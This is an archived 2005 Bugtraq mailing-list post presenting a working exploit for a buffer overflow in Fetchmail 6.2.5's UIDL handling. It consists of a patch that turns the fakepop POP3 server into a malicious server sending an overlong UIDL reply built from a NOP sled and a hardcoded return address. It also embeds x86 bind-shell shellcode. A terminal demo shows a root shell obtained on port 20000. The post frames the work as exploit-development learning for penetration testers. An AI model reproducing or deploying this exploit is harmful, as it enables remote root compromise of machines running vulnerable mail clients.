[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Fetchmail 6.2.5 exploit for Bugtraq ID: 14349
From: bannedit () frontiernet ! net
Date: 2005-08-30 16:02:03
Message-ID: 20050830160203.28469.qmail () securityfocus ! com
[Download RAW message or body]
The following exploit is brought to you by The Mantis Project which is a project \
geared towards learning the process of discovering and exploiting bugs in the wild. \
Exploits are based on published advisories which do not contain proof of concept code \
or unpublished findings. The project's purpose is to get a better understanding of \
wild bugs and the process of exploiting them while providing a resource to the \
community particularly penetration testers. So if you are interested in exploit \
development or just want to learn more about it feel free to join us on \
irc.pulltheplug.org #mantis or the mailing list at \
http://pulltheplug.org/cgi-bin/mailman/listinfo/mantis.
Special thanks to PullThePlug for hosting the project.
-------------------[exploit]-------------------
This patch is for fakepop version 7. fakepop is a fake pop3 server which is normally \
used to inform users of misconfigured clients.
Note: fakepop is ran by inetd
example:
<---+in terminal 1+--->
farenhiet:/home/bannedit/fetchmail-6.2.5# /usr/local/bin/fetchmail -p pop3 --fastuidl \
1 localhost
fetchmail: removing stale lockfile
Enter password for root@localhost:
UIDL 2
<---+in terminal 2+--->
farenhiet:/home/bannedit/exploit# perl -e '$|++;while (<>) { print . "\n\x00"; }' | \
nc localhost 20000 id
uid=0(root) gid=0(root) groups=0(root)
<----+patch for fakepop-7+--->
--- fakepop-7/fakepop.c 2004-12-01 12:13:02.000000000 -0500
+++ fakepop.c 2005-08-29 18:45:01.096792176 -0400
@@ -29,7 +29,12 @@
if (strcasecmp ("stat", cmd) == 0) {
known = 1;
- printf("+OK %d %d\r\n", msg_gettotalmsgs(), msg_gettotalsize());
+ printf("+OK 8 %d\r\n", msg_gettotalsize());
+ }
+
+ if(strcasecmp("last", cmd) == 0){
+ known = 1;
+ printf("-ERR 1\r\n");
}
if (strncasecmp ("list", cmd, 4) == 0) {
@@ -56,25 +61,17 @@
}
if (strncasecmp ("uidl", cmd, 4) == 0) {
- char s[71];
- int i;
- known = 1;
- if (strlen(cmd) > 5) {
- /* single message uidl */
- i = atoi(cmd+5);
- id_get_uidl (i, s);
- printf("+OK %d %s\r\n",i,s);
- } else {
- /* all messages uidl */
- int j;
- j = msg_gettotalmsgs();
- printf("+OK\r\n");
- for (i = 1; i <= j; i++) {
- id_get_uidl (i, s);
- printf("%d %s\r\n",i,s);
- }
- printf(".\r\n");
- }
+ known=1;
+
+ char s[177]; //177
+ long addy=0xbfffd702;
+ int i=atoi(cmd+5);
+
+ memset(s, 0x90, sizeof(s));
+ *(long*)&s[sizeof(s)-5]=addy;
+ s[sizeof(s)-1]='\0';
+
+ printf("+OK %d %s\r\n",i+1,s);
}
if (strncasecmp ("retr", cmd, 4) == 0) {
@@ -122,8 +119,21 @@
msg_init();
- printf ("+OK fakepop V%s %s <1234.5678901234@fakepop.invalid>\r\n",
- PROGRAM_VERSION, URL);
+ char sc[]=
+ "\x31\xdb\x31\xc9\xf7\xe3"
+ "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b"
+ "\xcd\x80\x89\xc7\x52\x66\x68\x4e\x20\x43\x66\x53\x89\xe1"
+ "\xb0\xef\xf6\xd0\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0"
+ "\x66\x43\x43\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd"
+ "\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51"
+ "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53"
+ "\x89\xe1\xb0\xf4\xf6\xd0\xcd\x80";
+
+char buff[strlen(sc)+100];
+memset(buff, 0x90, sizeof(buff));
+memcpy(&buff[sizeof(buff)-strlen(sc)], sc, strlen(sc));
+ printf ("+OK fakepop V%s %s %s <1234.5678901234@fakepop.invalid>\r\n",
+ PROGRAM_VERSION, URL, sc);
fflush(stdout);
while ((running == 1) && (fgets(cmd, CMD_MAX_SIZE, stdin) != NULL)) {
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic